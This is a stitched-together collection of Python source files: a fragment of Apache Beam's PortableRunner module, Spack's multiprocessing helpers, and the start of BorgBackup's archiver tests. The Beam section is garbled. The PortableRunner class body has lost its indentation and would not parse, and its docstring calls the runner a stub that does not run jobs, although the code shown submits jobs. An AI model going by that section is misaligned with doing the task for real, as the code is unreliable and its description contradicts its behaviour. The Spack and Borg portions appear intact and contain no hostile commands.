        except Exception:
            # TODO(BEAM-6442): Unify preparation_id and job_id for all runners.
            # Some services reject preparation_id here; the streams are
            # re-opened below with the job_id returned by Run().
            state_stream = message_stream = None
        # Run the job and wait for a result, we don't set a timeout here because
        # it may take a long time for a job to complete and streaming
        # jobs currently never return a response.
        run_response = self.job_service.Run(
            beam_job_api_pb2.RunJobRequest(preparation_id=preparation_id))
        if state_stream is None:
            state_stream = self.job_service.GetStateStream(
                beam_job_api_pb2.GetJobStateRequest(job_id=run_response.job_id))
            message_stream = self.job_service.GetMessageStream(
                beam_job_api_pb2.JobMessagesRequest(job_id=run_response.job_id))
        return run_response.job_id, message_stream, state_stream
class PortableRunner(runner.PipelineRunner):
"""
Experimental: No backward compatibility guaranteed.
A BeamRunner that executes Python pipelines via the Beam Job API.
This runner is a stub and does not run the actual job.
This runner schedules the job on a job service. The responsibility of
running and managing the job lies with the job service used.
"""
def __init__(self):
self._dockerized_job_server = None # type: Optional[job_server.JobServer]
@staticmethod
def _create_environment(options):
# type: (PipelineOptions) -> environments.Environment
portable_options = options.view_as(PortableOptions)
# Do not set a Runner. Otherwise this can cause problems in Java's
# PipelineOptions, i.e. ClassNotFoundException, if the corresponding Runner
# does not exist in the Java SDK. In portability, the entry point is clearly
# defined via the JobService.
portable_options.view_as(StandardOptions).runner = None
environment_type = portable_options.environment_type
if not environment_type:
environment_urn = common_urns.environments.DOCKER.urn
elif environment_type.startswith('beam:env:'):
environment_urn = environment_type
else:
# e.g. handle LOOPBACK -> EXTERNAL
environment_type = ENV_TYPE_ALIASES.get(
environment_type, environment_type)
try:
environment_urn = getattr(
common_urns.environments, environment_type).urn
except AttributeError:
raise ValueError('Unknown environment type: %s' % environment_type)
env_class = environments.Environment.get_env_cls_from_urn(environment_urn)
return env_class.from_options(portable_options)
def default_job_server(self, options):
raise NotImplementedError(
'You must specify a --job_endpoint when using --runner=PortableRunner. '
'Alternatively, you may specify which portable runner you intend to '
'use, such as --runner=FlinkRunner or --runner=SparkRunner.')
def create_job_service_handle(self, job_service, options):
return JobServiceHandle(job_service, options)
def create_job_service(self, options):
# type: (PipelineOptions) -> JobServiceHandle
"""
Start the job service and return a `JobServiceHandle`
"""
job_endpoint = options.view_as(PortableOptions).job_endpoint
if job_endpoint:
if job_endpoint == 'embed':
server = job_server.EmbeddedJobServer()
else:
job_server_timeout = options.view_as(PortableOptions).job_server_timeout
server = job_server.ExternalJobServer(job_endpoint, job_server_timeout)
else:
server = self.default_job_server(options)
return self.create_job_service_handle(server.start(), options)
@staticmethod
def get_proto_pipeline(pipeline, options):
# type: (Pipeline, PipelineOptions) -> beam_runner_api_pb2.Pipeline
portable_options = options.view_as(PortableOptions)
proto_pipeline = pipeline.to_runner_api(
default_environment=PortableRunner._create_environment(
portable_options))
# Preemptively apply combiner lifting, until all runners support it.
# These optimizations commute and are idempotent.
pre_optimize = options.view_as(DebugOptions).lookup_experiment(
'pre_optimize', 'lift_combiners').lower()
if not options.view_as(StandardOptions).streaming:
flink_known_urns = frozenset([
common_urns.composites.RESHUFFLE.urn,
common_urns.primitives.IMPULSE.urn,
common_urns.primitives.FLATTEN.urn,
common_urns.primitives.GROUP_BY_KEY.urn
])
if pre_optimize == 'none':
pass
elif pre_optimize == 'all':
proto_pipeline = translations.optimize_pipeline(
proto_pipeline,
phases=[
translations.annotate_downstream_side_inputs,
translations.annotate_stateful_dofns_as_roots,
translations.fix_side_input_pcoll_coders,
translations.lift_combiners,
translations.expand_sdf,
translations.fix_flatten_coders,
# fn_api_runner_transforms.sink_flattens,
translations.greedily_fuse,
translations.read_to_impulse,
translations.extract_impulse_stages,
translations.remove_data_plane_ops,
translations.sort_stages
],
known_runner_urns=flink_known_urns)
else:
phases = []
for phase_name in pre_optimize.split(','):
# For now, these are all we allow.
if phase_name in 'lift_combiners':
phases.append(getattr(translations, phase_name))
else:
raise ValueError(
'Unknown or inapplicable phase for pre_optimize: %s' %
phase_name)
proto_pipeline = translations.optimize_pipeline(
proto_pipeline,
phases=phases,
known_runner_urns=flink_known_urns,
partial=True)
return proto_pipeline
  def run_pipeline(self, pipeline, options):
    # type: (Pipeline, PipelineOptions) -> PipelineResult
    """Translate *pipeline* to proto form and submit it to the job service.

    For LOOPBACK environments a local external worker pool server is
    started first and its shutdown is registered as a cleanup callback on
    the returned PipelineResult.
    """
    portable_options = options.view_as(PortableOptions)

    # TODO: https://issues.apache.org/jira/browse/BEAM-5525
    # portable runner specific default
    if options.view_as(SetupOptions).sdk_location == 'default':
      options.view_as(SetupOptions).sdk_location = 'container'

    # This is needed as we start a worker server if one is requested
    # but none is provided.
    if portable_options.environment_type == 'LOOPBACK':
      use_loopback_process_worker = options.view_as(
          DebugOptions).lookup_experiment('use_loopback_process_worker', False)
      # The servicer returns (endpoint config for the SDK harness, server);
      # the endpoint is written back into the options so the runner can
      # reach the local worker pool.
      portable_options.environment_config, server = (
          worker_pool_main.BeamFnExternalWorkerPoolServicer.start(
              state_cache_size=sdk_worker_main._get_state_cache_size(options),
              data_buffer_time_limit_ms=
              sdk_worker_main._get_data_buffer_time_limit_ms(options),
              use_process=use_loopback_process_worker))
      # The pool server must be shut down once the job is done.
      cleanup_callbacks = [functools.partial(server.stop, 1)]
    else:
      cleanup_callbacks = []

    proto_pipeline = self.get_proto_pipeline(pipeline, options)
    job_service_handle = self.create_job_service(options)
    job_id, message_stream, state_stream = \
      job_service_handle.submit(proto_pipeline)

    result = PipelineResult(
        job_service_handle.job_service,
        job_id,
        message_stream,
        state_stream,
        cleanup_callbacks)
    if cleanup_callbacks:
      # Register an exit handler to ensure cleanup on exit.
      atexit.register(functools.partial(result._cleanup, on_exit=True))
      _LOGGER.info(
          'Environment "%s" has started a component necessary for the '
          'execution. Be sure to run the pipeline using\n'
          ' with Pipeline() as p:\n'
          ' p.apply(..)\n'
          'This ensures that the pipeline finishes before this program exits.',
          portable_options.environment_type)
    return result
class PortableMetrics(metric.MetricResults):
  """Metric results extracted from a job-service GetJobMetrics response."""
  def __init__(self, job_metrics_response):
    monitoring = job_metrics_response.metrics
    self.attempted = portable_metrics.from_monitoring_infos(
        monitoring.attempted)
    self.committed = portable_metrics.from_monitoring_infos(
        monitoring.committed)

  @staticmethod
  def _combine(committed, attempted, filter):
    # Merge both key sets and report committed/attempted values side by
    # side for every key accepted by the filter.
    results = []
    for key in set(committed) | set(attempted):
      if metric.MetricResults.matches(filter, key):
        results.append(
            MetricResult(key, committed.get(key), attempted.get(key)))
    return results

  def query(self, filter=None):
    # committed/attempted each hold (counters, distributions, gauges).
    combined = [
        self._combine(c, a, filter)
        for c, a in zip(self.committed, self.attempted)
    ]
    counters, distributions, gauges = combined
    return {
        self.COUNTERS: counters,
        self.DISTRIBUTIONS: distributions,
        self.GAUGES: gauges
    }
class PipelineResult(runner.PipelineResult):
  """Result handle for one job submitted to a portable job service.

  Wraps the job service stub and the streaming message/state responses of
  a single job and exposes the standard PipelineResult operations
  (cancel, state, metrics, wait_until_finish).
  """
  def __init__(
      self,
      job_service,
      job_id,
      message_stream,
      state_stream,
      cleanup_callbacks=()):
    super(PipelineResult, self).__init__(beam_job_api_pb2.JobState.UNSPECIFIED)
    self._job_service = job_service
    self._job_id = job_id
    # Responses collected by wait_until_finish(); scanned later for the
    # last error message.
    self._messages = []
    self._message_stream = message_stream
    self._state_stream = state_stream
    self._cleanup_callbacks = cleanup_callbacks
    self._metrics = None  # lazily populated by metrics()
    self._runtime_exception = None

  def cancel(self):
    """Ask the job service to cancel the job; always run cleanup."""
    try:
      self._job_service.Cancel(
          beam_job_api_pb2.CancelJobRequest(job_id=self._job_id))
    finally:
      self._cleanup()

  @property
  def state(self):
    """Poll the job service for the current pipeline state."""
    runner_api_state = self._job_service.GetState(
        beam_job_api_pb2.GetJobStateRequest(job_id=self._job_id)).state
    self._state = self._runner_api_state_to_pipeline_state(runner_api_state)
    return self._state

  @staticmethod
  def _runner_api_state_to_pipeline_state(runner_api_state):
    # The runner-API enum names mirror runner.PipelineState attributes.
    return getattr(
        runner.PipelineState,
        beam_job_api_pb2.JobState.Enum.Name(runner_api_state))

  @staticmethod
  def _pipeline_state_to_runner_api_state(pipeline_state):
    return beam_job_api_pb2.JobState.Enum.Value(pipeline_state)

  def metrics(self):
    """Fetch the job's metrics from the service (cached after first call)."""
    if not self._metrics:
      job_metrics_response = self._job_service.GetJobMetrics(
          beam_job_api_pb2.GetJobMetricsRequest(job_id=self._job_id))
      self._metrics = PortableMetrics(job_metrics_response)
    return self._metrics

  def _last_error_message(self):
    # Filter only messages with the "message_response" and error messages.
    messages = [
        m.message_response for m in self._messages
        if m.HasField('message_response')
    ]
    error_messages = [
        m for m in messages
        if m.importance == beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR
    ]
    if error_messages:
      return error_messages[-1].message_text
    else:
      return 'unknown error'

  def wait_until_finish(self, duration=None):
    """
    :param duration: The maximum time in milliseconds to wait for the result of
    the execution. If None or zero, will wait until the pipeline finishes.
    :return: The result of the pipeline, i.e. PipelineResult.
    """
    def read_messages():
      # Drain the message stream, logging each message and recording state
      # transitions; everything is kept for _last_error_message().
      previous_state = -1
      for message in self._message_stream:
        if message.HasField('message_response'):
          logging.log(
              MESSAGE_LOG_LEVELS[message.message_response.importance],
              "%s",
              message.message_response.message_text)
        else:
          current_state = message.state_response.state
          if current_state != previous_state:
            _LOGGER.info(
                "Job state changed to %s",
                self._runner_api_state_to_pipeline_state(current_state))
            previous_state = current_state
        self._messages.append(message)

    message_thread = threading.Thread(
        target=read_messages, name='wait_until_finish_read')
    message_thread.daemon = True
    message_thread.start()

    if duration:
      # Observe the state in the background and poll until either the
      # timeout elapses or the job reaches a terminal state.
      state_thread = threading.Thread(
          target=functools.partial(self._observe_state, message_thread),
          name='wait_until_finish_state_observer')
      state_thread.daemon = True
      state_thread.start()
      start_time = time.time()
      duration_secs = duration / 1000
      while (time.time() - start_time < duration_secs and
             state_thread.is_alive()):
        time.sleep(1)
    else:
      self._observe_state(message_thread)

    if self._runtime_exception:
      raise self._runtime_exception

    return self._state

  def _observe_state(self, message_thread):
    try:
      for state_response in self._state_stream:
        self._state = self._runner_api_state_to_pipeline_state(
            state_response.state)
        if state_response.state in TERMINAL_STATES:
          # Wait for any last messages.
          message_thread.join(10)
          break
      if self._state != runner.PipelineState.DONE:
        self._runtime_exception = RuntimeError(
            'Pipeline %s failed in state %s: %s' %
            (self._job_id, self._state, self._last_error_message()))
    except Exception as e:
      self._runtime_exception = e
    finally:
      self._cleanup()

  def _cleanup(self, on_exit=False):
    """Run and discard all cleanup callbacks; re-raise the last failure."""
    if on_exit and self._cleanup_callbacks:
      _LOGGER.info(
          'Running cleanup on exit. If your pipeline should continue running, '
          'be sure to use the following syntax:\n'
          ' with Pipeline() as p:\n'
          ' p.apply(..)\n'
          'This ensures that the pipeline finishes before this program exits.')
    # Run every callback even if some fail, then surface the last failure.
    # Bugfix: the original did a bare `raise` outside any except block,
    # which raises "RuntimeError: No active exception to re-raise" instead
    # of the callback's actual exception.
    error = None
    for callback in self._cleanup_callbacks:
      try:
        callback()
      except Exception as exc:
        error = exc
    self._cleanup_callbacks = ()
    if error is not None:
      raise error
|
multiproc.py
|
# Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
"""
This implements a parallel map operation but it can accept more values
than multiprocessing.Pool.apply() can. For example, apply() will fail
to pickle functions if they're passed indirectly as parameters.
"""
from multiprocessing import Process, Pipe, Semaphore, Value
__all__ = ['spawn', 'parmap', 'Barrier']
def spawn(f):
    """Return a wrapper that applies *f* and ships the result over a pipe.

    The wrapper takes a pipe connection and one argument, sends ``f(x)``
    through the connection, then closes it.
    """
    def _apply_and_send(conn, value):
        conn.send(f(value))
        conn.close()
    return _apply_and_send
def parmap(f, elements):
    """Apply *f* to each element in parallel, one process per element.

    Results are returned in input order.

    Results are received *before* the worker processes are joined:
    joining first can deadlock when a result is larger than the pipe
    buffer, since the child then blocks in ``send()`` while the parent
    blocks in ``join()``.
    """
    elements = list(elements)  # may be a generator; we iterate it twice
    pipes = [Pipe() for _ in elements]
    procs = [Process(target=spawn(f), args=(child, x))
             for x, (parent, child) in zip(elements, pipes)]
    for proc in procs:
        proc.start()
    results = [parent.recv() for (parent, child) in pipes]
    for proc in procs:
        proc.join()
    return results
class Barrier:
    """Simple reusable semaphore barrier.

    Python 2.6 doesn't have multiprocessing barriers so we implement this.

    See http://greenteapress.com/semaphores/downey08semaphores.pdf, p. 41.
    """
    def __init__(self, n, timeout=None):
        self.n = n    # number of parties that must arrive before release
        self.to = timeout  # per-acquire timeout in seconds (None: block forever)
        self.count = Value('i', 0)       # shared arrival counter
        self.mutex = Semaphore(1)        # guards self.count
        self.turnstile1 = Semaphore(0)   # opened when all n have arrived
        self.turnstile2 = Semaphore(1)   # blocks re-entry until all have left

    def wait(self):
        """Block until all n parties have called wait().

        Raises BarrierTimeoutError if any semaphore acquire exceeds the
        configured timeout.
        """
        # Phase 1: arrive. The last arriver locks turnstile2 (preventing
        # premature re-entry) and opens turnstile1.
        if not self.mutex.acquire(timeout=self.to):
            raise BarrierTimeoutError()
        self.count.value += 1
        if self.count.value == self.n:
            if not self.turnstile2.acquire(timeout=self.to):
                raise BarrierTimeoutError()
            self.turnstile1.release()
        self.mutex.release()

        # Pass turnstile1 one at a time; each passer re-releases it so the
        # next waiter can go through.
        if not self.turnstile1.acquire(timeout=self.to):
            raise BarrierTimeoutError()
        self.turnstile1.release()

        # Phase 2: leave. The last leaver re-locks turnstile1 and opens
        # turnstile2, restoring the initial state so the barrier is reusable.
        if not self.mutex.acquire(timeout=self.to):
            raise BarrierTimeoutError()
        self.count.value -= 1
        if self.count.value == 0:
            if not self.turnstile1.acquire(timeout=self.to):
                raise BarrierTimeoutError()
            self.turnstile2.release()
        self.mutex.release()

        if not self.turnstile2.acquire(timeout=self.to):
            raise BarrierTimeoutError()
        self.turnstile2.release()
class BarrierTimeoutError(Exception):
    """Raised by Barrier.wait() when a semaphore acquire times out."""
    pass
|
archiver.py
|
import argparse
import dateutil.tz
import errno
import io
import json
import logging
import os
import pstats
import random
import re
import shutil
import socket
import stat
import subprocess
import sys
import tempfile
import time
import unittest
from binascii import unhexlify, b2a_base64
from configparser import ConfigParser
from datetime import datetime
from datetime import timezone
from datetime import timedelta
from hashlib import sha256
from io import BytesIO, StringIO
from unittest.mock import patch
import pytest
import borg
from .. import xattr, helpers, platform
from ..archive import Archive, ChunkBuffer
from ..archiver import Archiver, parse_storage_quota, PURE_PYTHON_MSGPACK_WARNING
from ..cache import Cache, LocalCache
from ..chunker import has_seek_hole
from ..constants import * # NOQA
from ..crypto.low_level import bytes_to_long, num_cipher_blocks
from ..crypto.key import KeyfileKeyBase, RepoKey, KeyfileKey, Passphrase, TAMRequiredError
from ..crypto.keymanager import RepoIdMismatch, NotABorgKeyFile
from ..crypto.file_integrity import FileIntegrityError
from ..helpers import Location, get_security_dir
from ..helpers import Manifest, MandatoryFeatureUnsupported
from ..helpers import EXIT_SUCCESS, EXIT_WARNING, EXIT_ERROR
from ..helpers import bin_to_hex
from ..helpers import MAX_S
from ..helpers import msgpack
from ..helpers import flags_noatime, flags_normal
from ..nanorst import RstToTextLazy, rst_to_terminal
from ..patterns import IECommand, PatternMatcher, parse_pattern
from ..item import Item, ItemDiff
from ..locking import LockFailed
from ..logger import setup_logging
from ..remote import RemoteRepository, PathNotAllowed
from ..repository import Repository
from . import has_lchflags, llfuse
from . import BaseTestCase, changedir, environment_variable, no_selinux
from . import are_symlinks_supported, are_hardlinks_supported, are_fifos_supported, is_utime_fully_supported, is_birthtime_fully_supported
from .platform import fakeroot_detected
from .upgrader import make_attic_repo
from . import key
# Root of the borg source tree (parent of this testsuite package); used by
# create_src_archive() as a convenient non-trivial directory tree to back up.
src_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))
def exec_cmd(*args, archiver=None, fork=False, exe=None, input=b'', binary_output=False, **kw):
    """Execute a borg command and return ``(exit_code, output)``.

    :param args: borg command line arguments, e.g. ('init', '--encryption=none', path)
    :param archiver: reuse this Archiver instance (in-process mode only)
    :param fork: run in a subprocess instead of in-process
    :param exe: None -> run ``python -m borg.archiver``; str -> path of a
        borg binary; tuple -> complete argv prefix. Only used when forking.
    :param input: bytes fed to stdin
    :param binary_output: return output as bytes instead of decoded str
    """
    if fork:
        try:
            if exe is None:
                borg = (sys.executable, '-m', 'borg.archiver')
            elif isinstance(exe, str):
                borg = (exe, )
            elif isinstance(exe, tuple):
                # Bugfix: a tuple exe previously fell through without
                # assigning ``borg``, so the module-level ``borg`` *module*
                # was used and ``borg + args`` crashed - even though the
                # error message below documents tuples as valid.
                borg = exe
            else:
                raise ValueError('exe must be None, a tuple or a str')
            output = subprocess.check_output(borg + args, stderr=subprocess.STDOUT, input=input)
            ret = 0
        except subprocess.CalledProcessError as e:
            output = e.output
            ret = e.returncode
        except SystemExit as e:  # possibly raised by argparse
            output = ''
            ret = e.code
        if binary_output:
            return ret, output
        else:
            return ret, os.fsdecode(output)
    else:
        # In-process execution: temporarily redirect stdio so the archiver's
        # output can be captured, and always restore the real streams.
        stdin, stdout, stderr = sys.stdin, sys.stdout, sys.stderr
        try:
            sys.stdin = StringIO(input.decode())
            sys.stdin.buffer = BytesIO(input)
            output = BytesIO()
            # Always use utf-8 here, to simplify .decode() below
            output_text = sys.stdout = sys.stderr = io.TextIOWrapper(output, encoding='utf-8')
            if archiver is None:
                archiver = Archiver()
            archiver.prerun_checks = lambda *args: None
            archiver.exit_code = EXIT_SUCCESS
            helpers.exit_code = EXIT_SUCCESS
            try:
                args = archiver.parse_args(list(args))
                # argparse parsing may raise SystemExit when the command line is bad or
                # actions that abort early (eg. --help) were given. Catch this and return
                # the error code as-if we invoked a Borg binary.
            except SystemExit as e:
                output_text.flush()
                return e.code, output.getvalue() if binary_output else output.getvalue().decode()
            ret = archiver.run(args)
            output_text.flush()
            return ret, output.getvalue() if binary_output else output.getvalue().decode()
        finally:
            sys.stdin, sys.stdout, sys.stderr = stdin, stdout, stderr
def have_gnutar():
    """Return True if a GNU tar binary is available on PATH."""
    tar_path = shutil.which('tar')
    if tar_path is None:
        return False
    proc = subprocess.Popen(['tar', '--version'], stdout=subprocess.PIPE)
    out, _ = proc.communicate()
    return b'GNU tar' in out
# check if the binary "borg.exe" is available (for local testing a symlink to virtualenv/bin/borg should do)
try:
    exec_cmd('help', exe='borg.exe', fork=True)
    BORG_EXES = ['python', 'binary', ]
except FileNotFoundError:
    # no binary found: run the test matrix against the in-process entry point only
    BORG_EXES = ['python', ]
@pytest.fixture(params=BORG_EXES)
def cmd(request):
    """Parametrized fixture: run borg in-process ('python') or as a binary."""
    exe_map = {'python': None, 'binary': 'borg.exe'}
    try:
        exe = exe_map[request.param]
    except KeyError:
        raise ValueError("param must be 'python' or 'binary'")

    def exec_fn(*args, **kw):
        return exec_cmd(*args, exe=exe, fork=True, **kw)
    return exec_fn
def test_return_codes(cmd, tmpdir):
    """Smoke-test borg exit codes: success, warning (no match), error (dup name)."""
    repo = tmpdir.mkdir('repo')
    input = tmpdir.mkdir('input')
    output = tmpdir.mkdir('output')
    input.join('test_file').write('content')
    rc, out = cmd('init', '--encryption=none', '%s' % str(repo))
    assert rc == EXIT_SUCCESS
    rc, out = cmd('create', '%s::archive' % repo, str(input))
    assert rc == EXIT_SUCCESS
    with changedir(str(output)):
        rc, out = cmd('extract', '%s::archive' % repo)
        assert rc == EXIT_SUCCESS
    rc, out = cmd('extract', '%s::archive' % repo, 'does/not/match')
    assert rc == EXIT_WARNING  # pattern did not match
    rc, out = cmd('create', '%s::archive' % repo, str(input))
    assert rc == EXIT_ERROR  # duplicate archive name
"""
test_disk_full is very slow and not recommended to be included in daily testing.
for this test, an empty, writable 16MB filesystem mounted on DF_MOUNT is required.
for speed and other reasons, it is recommended that the underlying block device is
in RAM, not a magnetic or flash disk.
assuming /tmp is a tmpfs (in memory filesystem), one can use this:
dd if=/dev/zero of=/tmp/borg-disk bs=16M count=1
mkfs.ext4 /tmp/borg-disk
mkdir /tmp/borg-mount
sudo mount /tmp/borg-disk /tmp/borg-mount
if the directory does not exist, the test will be skipped.
"""
# Mount point of the small test filesystem required by test_disk_full.
DF_MOUNT = '/tmp/borg-mount'


@pytest.mark.skipif(not os.path.exists(DF_MOUNT), reason="needs a 16MB fs mounted on %s" % DF_MOUNT)
def test_disk_full(cmd):
    """Repeatedly fill the small filesystem until borg fails, then verify the
    repo can still be listed and repaired after space is freed."""
    def make_files(dir, count, size, rnd=True):
        # (Re)create *dir* with up to *count* files of up to *size* random bytes.
        shutil.rmtree(dir, ignore_errors=True)
        os.mkdir(dir)
        if rnd:
            count = random.randint(1, count)
            if size > 1:
                size = random.randint(1, size)
        for i in range(count):
            fn = os.path.join(dir, "file%03d" % i)
            with open(fn, 'wb') as f:
                data = os.urandom(size)
                f.write(data)

    with environment_variable(BORG_CHECK_I_KNOW_WHAT_I_AM_DOING='YES'):
        mount = DF_MOUNT
        assert os.path.exists(mount)
        repo = os.path.join(mount, 'repo')
        input = os.path.join(mount, 'input')
        reserve = os.path.join(mount, 'reserve')
        for j in range(100):
            shutil.rmtree(repo, ignore_errors=True)
            shutil.rmtree(input, ignore_errors=True)
            # keep some space and some inodes in reserve that we can free up later:
            make_files(reserve, 80, 100000, rnd=False)
            rc, out = cmd('init', repo)
            if rc != EXIT_SUCCESS:
                print('init', rc, out)
            assert rc == EXIT_SUCCESS
            try:
                success, i = True, 0
                while success:
                    i += 1
                    try:
                        make_files(input, 20, 200000)
                    except OSError as err:
                        if err.errno == errno.ENOSPC:
                            # already out of space
                            break
                        raise
                    try:
                        rc, out = cmd('create', '%s::test%03d' % (repo, i), input)
                        success = rc == EXIT_SUCCESS
                        if not success:
                            print('create', rc, out)
                    finally:
                        # make sure repo is not locked
                        shutil.rmtree(os.path.join(repo, 'lock.exclusive'), ignore_errors=True)
                        os.remove(os.path.join(repo, 'lock.roster'))
            finally:
                # now some error happened, likely we are out of disk space.
                # free some space so we can expect borg to be able to work normally:
                shutil.rmtree(reserve, ignore_errors=True)
            rc, out = cmd('list', repo)
            if rc != EXIT_SUCCESS:
                print('list', rc, out)
            rc, out = cmd('check', '--repair', repo)
            if rc != EXIT_SUCCESS:
                print('check', rc, out)
            assert rc == EXIT_SUCCESS
class ArchiverTestCaseBase(BaseTestCase):
    """Shared fixture for archiver tests: builds a temp dir with repository,
    input/output dirs, key/cache dirs and helpers to run borg commands."""
    EXE = None  # python source based
    FORK_DEFAULT = False
    prefix = ''  # prepended to the repo path (e.g. 'ssh://...' for remote tests)

    def setUp(self):
        # Disable safety prompts and set a fixed passphrase for all tests.
        os.environ['BORG_CHECK_I_KNOW_WHAT_I_AM_DOING'] = 'YES'
        os.environ['BORG_DELETE_I_KNOW_WHAT_I_AM_DOING'] = 'YES'
        os.environ['BORG_PASSPHRASE'] = 'waytooeasyonlyfortests'
        # In-process mode reuses one Archiver instance; forked mode does not.
        self.archiver = not self.FORK_DEFAULT and Archiver() or None
        self.tmpdir = tempfile.mkdtemp()
        self.repository_path = os.path.join(self.tmpdir, 'repository')
        self.repository_location = self.prefix + self.repository_path
        self.input_path = os.path.join(self.tmpdir, 'input')
        self.output_path = os.path.join(self.tmpdir, 'output')
        self.keys_path = os.path.join(self.tmpdir, 'keys')
        self.cache_path = os.path.join(self.tmpdir, 'cache')
        self.exclude_file_path = os.path.join(self.tmpdir, 'excludes')
        self.patterns_file_path = os.path.join(self.tmpdir, 'patterns')
        os.environ['BORG_KEYS_DIR'] = self.keys_path
        os.environ['BORG_CACHE_DIR'] = self.cache_path
        os.mkdir(self.input_path)
        os.chmod(self.input_path, 0o777)  # avoid troubles with fakeroot / FUSE
        os.mkdir(self.output_path)
        os.mkdir(self.keys_path)
        os.mkdir(self.cache_path)
        with open(self.exclude_file_path, 'wb') as fd:
            fd.write(b'input/file2\n# A comment line, then a blank line\n\n')
        with open(self.patterns_file_path, 'wb') as fd:
            fd.write(b'+input/file_important\n- input/file*\n# A comment line, then a blank line\n\n')
        self._old_wd = os.getcwd()
        os.chdir(self.tmpdir)

    def tearDown(self):
        os.chdir(self._old_wd)
        # note: ignore_errors=True as workaround for issue #862
        shutil.rmtree(self.tmpdir, ignore_errors=True)
        # reset logging after tests that may have reconfigured it
        setup_logging()

    def cmd(self, *args, **kw):
        """Run a borg command; assert its exit code and return its output with
        pure-python msgpack warnings filtered out."""
        exit_code = kw.pop('exit_code', 0)
        fork = kw.pop('fork', None)
        binary_output = kw.get('binary_output', False)
        if fork is None:
            fork = self.FORK_DEFAULT
        ret, output = exec_cmd(*args, fork=fork, exe=self.EXE, archiver=self.archiver, **kw)
        if ret != exit_code:
            print(output)
        self.assert_equal(ret, exit_code)
        # if tests are run with the pure-python msgpack, there will be warnings about
        # this in the output, which would make a lot of tests fail.
        pp_msg = PURE_PYTHON_MSGPACK_WARNING.encode() if binary_output else PURE_PYTHON_MSGPACK_WARNING
        empty = b'' if binary_output else ''
        output = empty.join(line for line in output.splitlines(keepends=True)
                            if pp_msg not in line)
        return output

    def create_src_archive(self, name):
        # Archive the borg source tree itself as a realistic input set.
        self.cmd('create', '--compression=lz4', self.repository_location + '::' + name, src_dir)

    def open_archive(self, name):
        """Open archive *name* directly (bypassing the CLI) and return
        (archive, repository)."""
        repository = Repository(self.repository_path, exclusive=True)
        with repository:
            manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
            archive = Archive(repository, key, manifest, name)
        return archive, repository

    def open_repository(self):
        return Repository(self.repository_path, exclusive=True)

    def create_regular_file(self, name, size=0, contents=None):
        """Create input file *name* with *size* 'X' bytes or the given contents."""
        assert not (size != 0 and contents and len(contents) != size), 'size and contents do not match'
        filename = os.path.join(self.input_path, name)
        if not os.path.exists(os.path.dirname(filename)):
            os.makedirs(os.path.dirname(filename))
        with open(filename, 'wb') as fd:
            if contents is None:
                contents = b'X' * size
            fd.write(contents)

    def create_test_files(self):
        """Create a minimal test case including all supported file types
        """
        # File
        self.create_regular_file('file1', size=1024 * 80)
        self.create_regular_file('flagfile', size=1024)
        # Directory
        self.create_regular_file('dir2/file2', size=1024 * 80)
        # File mode
        os.chmod('input/file1', 0o4755)
        # Hard link
        if are_hardlinks_supported():
            os.link(os.path.join(self.input_path, 'file1'),
                    os.path.join(self.input_path, 'hardlink'))
        # Symlink
        if are_symlinks_supported():
            os.symlink('somewhere', os.path.join(self.input_path, 'link1'))
        self.create_regular_file('fusexattr', size=1)
        if not xattr.XATTR_FAKEROOT and xattr.is_enabled(self.input_path):
            fn = os.fsencode(os.path.join(self.input_path, 'fusexattr'))
            # ironically, due to the way how fakeroot works, comparing FUSE file xattrs to orig file xattrs
            # will FAIL if fakeroot supports xattrs, thus we only set the xattr if XATTR_FAKEROOT is False.
            # This is because fakeroot with xattr-support does not propagate xattrs of the underlying file
            # into "fakeroot space". Because the xattrs exposed by borgfs are these of an underlying file
            # (from fakeroots point of view) they are invisible to the test process inside the fakeroot.
            xattr.setxattr(fn, b'user.foo', b'bar')
            xattr.setxattr(fn, b'user.empty', b'')
            # XXX this always fails for me
            # ubuntu 14.04, on a TMP dir filesystem with user_xattr, using fakeroot
            # same for newer ubuntu and centos.
            # if this is supported just on specific platform, platform should be checked first,
            # so that the test setup for all tests using it does not fail here always for others.
            # xattr.setxattr(os.path.join(self.input_path, 'link1'), b'user.foo_symlink', b'bar_symlink', follow_symlinks=False)
        # FIFO node
        if are_fifos_supported():
            os.mkfifo(os.path.join(self.input_path, 'fifo1'))
        if has_lchflags:
            platform.set_flags(os.path.join(self.input_path, 'flagfile'), stat.UF_NODUMP)
        try:
            # Block device
            os.mknod('input/bdev', 0o600 | stat.S_IFBLK, os.makedev(10, 20))
            # Char device
            os.mknod('input/cdev', 0o600 | stat.S_IFCHR, os.makedev(30, 40))
            # File mode
            os.chmod('input/dir2', 0o555)  # if we take away write perms, we need root to remove contents
            # File owner
            os.chown('input/file1', 100, 200)  # raises OSError invalid argument on cygwin
            have_root = True  # we have (fake)root
        except PermissionError:
            have_root = False
        except OSError as e:
            # Note: ENOSYS "Function not implemented" happens as non-root on Win 10 Linux Subsystem.
            if e.errno not in (errno.EINVAL, errno.ENOSYS):
                raise
            have_root = False
        time.sleep(1)  # "empty" must have newer timestamp than other files
        self.create_regular_file('empty', size=0)
        return have_root
class ArchiverTestCase(ArchiverTestCaseBase):
    # decorator to skip tests on platforms without hard link support
    requires_hardlinks = pytest.mark.skipif(not are_hardlinks_supported(), reason='hardlinks not supported')

    def test_basic_functionality(self):
        """End-to-end init/create/extract/list/info round trip over all
        supported file types."""
        have_root = self.create_test_files()
        # fork required to test show-rc output
        output = self.cmd('init', '--encryption=repokey', '--show-version', '--show-rc', self.repository_location, fork=True)
        self.assert_in('borgbackup version', output)
        self.assert_in('terminating with success status, rc 0', output)
        self.cmd('create', '--exclude-nodump', self.repository_location + '::test', 'input')
        output = self.cmd('create', '--exclude-nodump', '--stats', self.repository_location + '::test.2', 'input')
        self.assert_in('Archive name: test.2', output)
        self.assert_in('This archive: ', output)
        with changedir('output'):
            self.cmd('extract', self.repository_location + '::test')
        list_output = self.cmd('list', '--short', self.repository_location)
        self.assert_in('test', list_output)
        self.assert_in('test.2', list_output)
        expected = [
            'input',
            'input/bdev',
            'input/cdev',
            'input/dir2',
            'input/dir2/file2',
            'input/empty',
            'input/file1',
            'input/flagfile',
        ]
        if are_fifos_supported():
            expected.append('input/fifo1')
        if are_symlinks_supported():
            expected.append('input/link1')
        if are_hardlinks_supported():
            expected.append('input/hardlink')
        if not have_root:
